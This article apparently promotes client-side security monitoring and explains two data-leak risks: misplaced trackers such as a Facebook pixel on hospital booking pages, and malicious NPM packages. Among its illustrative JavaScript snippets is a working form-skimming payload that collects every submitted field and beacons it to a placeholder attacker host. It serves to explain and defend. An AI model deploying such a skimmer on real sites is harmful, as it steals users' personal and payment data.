Security Experts Warn of Two Primary Client-Side Risks Associated with Data Exfiltration and Loss

Two client-side risks dominate the problems of data loss and data exfiltration: improperly placed trackers on websites and web applications, and malicious client-side code pulled from third-party repositories such as NPM.

Client-side security researchers are finding that improperly placed trackers, while not intentionally malicious, are a growing problem with clear and significant privacy implications, as well as compliance implications under regulatory frameworks like HIPAA and PCI DSS 4.0. To highlight the risks of misplaced trackers, a recent study by The Markup (a non-profit news organization) examined the websites of Newsweek’s top 100 hospitals in America. The researchers found a Facebook tracker on one-third of the hospital websites that sent Facebook highly personal healthcare data whenever a user clicked the “schedule appointment” button. The data was not necessarily anonymized, either: it was connected to an IP address, and both the IP address and the appointment information were delivered to Facebook.
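
To make the mechanism concrete, the sketch below shows how a site-wide tracker snippet can leak appointment details. The pixel ID, selectors, and event payload are hypothetical; `fbq` is the standard interface defined by the Facebook/Meta Pixel loader. Because the tracking call is an ordinary HTTP request, the visitor’s IP address accompanies the payload automatically.

```javascript
// Hypothetical sketch of a misplaced tracker integration. The pixel ID,
// selectors, and event payload are illustrative placeholders; `fbq` is
// assumed to be defined by the standard Meta Pixel loader snippet.
fbq('init', '000000000000000'); // placeholder pixel ID

document.querySelector('#schedule-appointment')?.addEventListener('click', () => {
  // The tracking call rides on an ordinary HTTP request, so the visitor's
  // IP address reaches the tracker along with the event payload.
  fbq('track', 'Schedule', {
    physician: document.querySelector('#doctor-name')?.textContent,
    searchTerm: document.querySelector('#condition-search')?.value,
  });
});
```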

Journalists and client-side security researchers aren’t the only ones looking at data privacy issues. Last week, the FTC announced plans to crack down on tech companies’ improper or illegal use and sharing of highly sensitive data, indicating that it also plans to target false claims about data anonymization. The agency points out that the combination of sensitive health information and the opaque data practices of technology companies is extremely problematic, with most consumers having little or no knowledge of what data is collected, how it is collected, how it is used, or how it is protected.

The security industry has repeatedly proven how easy it is to re-identify anonymized data by combining several datasets to create a clear picture of the end user’s identity.
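
A toy example (with fabricated records and quasi-identifiers) shows how the join works: two datasets that each look harmless on their own can be linked on shared attributes such as ZIP code and date of birth.

```javascript
// Toy re-identification sketch with fabricated data. Each dataset looks
// "anonymized" on its own, but the shared quasi-identifiers (ZIP code and
// date of birth) are enough to link a medical record back to a name.
const medicalRecords = [
  { zip: '02138', dob: '1961-07-31', diagnosis: 'hypertension' },
];
const voterRolls = [
  { zip: '02138', dob: '1961-07-31', name: 'Jane Doe' },
];

const reidentified = medicalRecords.map((record) => ({
  ...record,
  ...voterRolls.find((v) => v.zip === record.zip && v.dob === record.dob),
}));

console.log(reidentified);
// [{ zip: '02138', dob: '1961-07-31', diagnosis: 'hypertension', name: 'Jane Doe' }]
```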

In addition to improperly placed web trackers, client-side security researchers are warning about the risks associated with JavaScript code pulled from third-party repositories like NPM. Recent research found packages containing obfuscated, malicious JavaScript being used to harvest sensitive information from websites and web applications. Using sources like NPM, threat actors target organizations with JavaScript software supply chain attacks, planting rogue components that exfiltrate data entered into forms on any website that includes the malicious code.
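
Stripped of its obfuscation, a payload of this kind often reduces to a form-submission hook that beacons field values to an attacker-controlled endpoint. The sketch below is a simplified illustration; the exfiltration domain is a placeholder.

```javascript
// Simplified, de-obfuscated sketch of a form-skimming payload of the kind
// shipped in rogue NPM packages. The exfiltration endpoint is a placeholder.
document.addEventListener('submit', (event) => {
  const stolen = {};
  for (const field of event.target.querySelectorAll('input, select, textarea')) {
    if (field.name) stolen[field.name] = field.value;
  }
  // sendBeacon fires even as the page navigates away, making the
  // exfiltration hard to spot in normal use.
  navigator.sendBeacon('https://attacker.example/collect', JSON.stringify(stolen));
}, true); // capture phase: runs before the site's own submit handlers
```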

Client-side security researchers advise several approaches for identifying and mitigating these two primary risks. Client-side attack surface monitoring is the most comprehensive, protecting end users and businesses from the risk of data theft due to Magecart, e-skimming, cross-site scripting, and JavaScript injection attacks. Other tools, like web application firewalls (WAFs), protect some aspects of the client-side attack surface but fail to cover activity on dynamic web pages. Content security policies (CSPs) are another good client-side security tool, but they are cumbersome to maintain: manual code reviews to identify problems with a CSP can mean long hours (or days) scouring thousands of lines of web application script.
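
For context, a CSP is delivered as an HTTP response header enumerating every origin the browser may load resources from. The Node/Express-style sketch below (with placeholder origins) hints at why this becomes unwieldy: every new tracker, CDN, or third-party script means another manually curated entry.

```javascript
const express = require('express');
const app = express();

// Minimal sketch of serving a Content-Security-Policy header from an
// Express app. The allowed origins are placeholders; production policies
// routinely grow to dozens of entries that must be curated by hand.
app.use((req, res, next) => {
  res.setHeader(
    'Content-Security-Policy',
    [
      "default-src 'self'",
      "script-src 'self' https://cdn.example.com",
      "connect-src 'self' https://api.example.com",
      "form-action 'self'",
    ].join('; ')
  );
  next();
});

app.listen(3000);
```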

Security professionals can also explore client-side attack surface mapping solutions that incorporate threat intelligence, access insights (which assets are accessing what data), and privacy analysis (whether any data is being shared with external sources inappropriately).
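
The record such a mapping might produce can be sketched roughly as follows; the request shape, the first-party list, and the `geolocateHost` helper are all hypothetical stand-ins for whatever telemetry a real solution collects.

```javascript
// Hypothetical sketch of turning observed network requests into
// access-insight records. The request shape, first-party list, and
// geolocateHost helper are illustrative stand-ins.
const FIRST_PARTY = new Set(['www.example.com', 'api.example.com']);

function accessInsights(observedRequests, geolocateHost) {
  return observedRequests.map((req) => {
    const host = new URL(req.url).hostname;
    return {
      asset: req.initiatorScript,              // which script made the request
      dataAccessed: req.formFields,            // what data it carried
      thirdParty: !FIRST_PARTY.has(host),      // access insight
      destinationCountry: geolocateHost(host), // privacy / cross-border check
    };
  });
}
```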

Client-side attack surface monitoring solutions are a relatively new cybersecurity technology that automatically discovers all of a company’s web assets and reports on their data access. These solutions use headless browsers to load and execute the JavaScript on website and web application pages, gathering real-time information about how the scanned site behaves from the end user’s perspective.
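
As a rough sketch of the underlying technique (using the open-source Puppeteer library as a stand-in for whatever headless browser a given product embeds), a crawler can load a page and record every script it pulls in:

```javascript
const puppeteer = require('puppeteer');

// Sketch: load a page in a headless browser and log every script it pulls in,
// approximating how monitoring solutions see a site from the user's side.
(async () => {
  const browser = await puppeteer.launch();
  const page = await browser.newPage();

  page.on('request', (request) => {
    if (request.resourceType() === 'script') {
      console.log('script loaded:', request.url());
    }
  });

  await page.goto('https://www.example.com', { waitUntil: 'networkidle0' });
  await browser.close();
})();
```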

A key technological component of client-side attack surface monitoring solutions is the synthetic user, deployed during threat detection crawls to interact with dynamic web pages the way a real human would. Synthetic users can complete a variety of activities, including clicking active links, submitting forms, solving Captchas, and entering financial information. Their interactions are logged and monitored, followed by behavioral analysis and logic injection into each page to gather information that is difficult to collect manually: form data, the data third-party scripts have access to, the trackers deployed and their activities, and any forms or third-party scripts transferring data across national boundaries.
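
Building on the same headless-browser approach, a synthetic-user step might look roughly like the sketch below; the URL, selectors, and test values are illustrative. Any unexpected host contacted during the interaction is a candidate tracker or exfiltration endpoint.

```javascript
const puppeteer = require('puppeteer');

// Sketch of a synthetic-user crawl: fill and submit a form with dummy data
// while recording which hosts receive outbound requests during the run.
// The URL, selectors, and test values are illustrative placeholders.
(async () => {
  const browser = await puppeteer.launch();
  const page = await browser.newPage();
  const contactedHosts = new Set();

  page.on('request', (req) => contactedHosts.add(new URL(req.url()).hostname));

  await page.goto('https://www.example.com/checkout');
  await page.type('#email', 'synthetic-user@example.com');
  await page.type('#card-number', '4111111111111111'); // standard test PAN
  await page.click('#submit');

  // Anything unexpected here is a candidate tracker or exfiltration endpoint.
  console.log([...contactedHosts]);
  await browser.close();
})();
```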

Solutions should also be able to operationalize any issues discovered during identification or client-side mapping, both through allowlists and blocklists and through post-scan analyses that synthesize the findings into actionable intelligence for securing web applications.
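
A minimal sketch of the allowlist/blocklist step, assuming a crawl like the one above has produced a set of contacted hosts (the list entries are placeholders):

```javascript
// Sketch: operationalize crawl findings with allow/block lists.
// Host entries are placeholders for a real policy.
const ALLOWLIST = new Set(['www.example.com', 'cdn.example.com']);
const BLOCKLIST = new Set(['attacker.example']);

function triage(contactedHosts) {
  return [...contactedHosts].map((host) => ({
    host,
    verdict: BLOCKLIST.has(host)
      ? 'block'   // known-bad: alert and block
      : ALLOWLIST.has(host)
        ? 'allow' // expected first or third party
        : 'review', // new host: route to analyst review
  }));
}

console.log(triage(new Set(['cdn.example.com', 'attacker.example', 'new.example'])));
```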

Security professionals with client-side expertise strongly advise organizations in industries such as financial services, media/entertainment, e-commerce, healthcare, and technology/SaaS, particularly those with multiple front-end web applications, to understand client-side security and how client-side risks may impact their business.
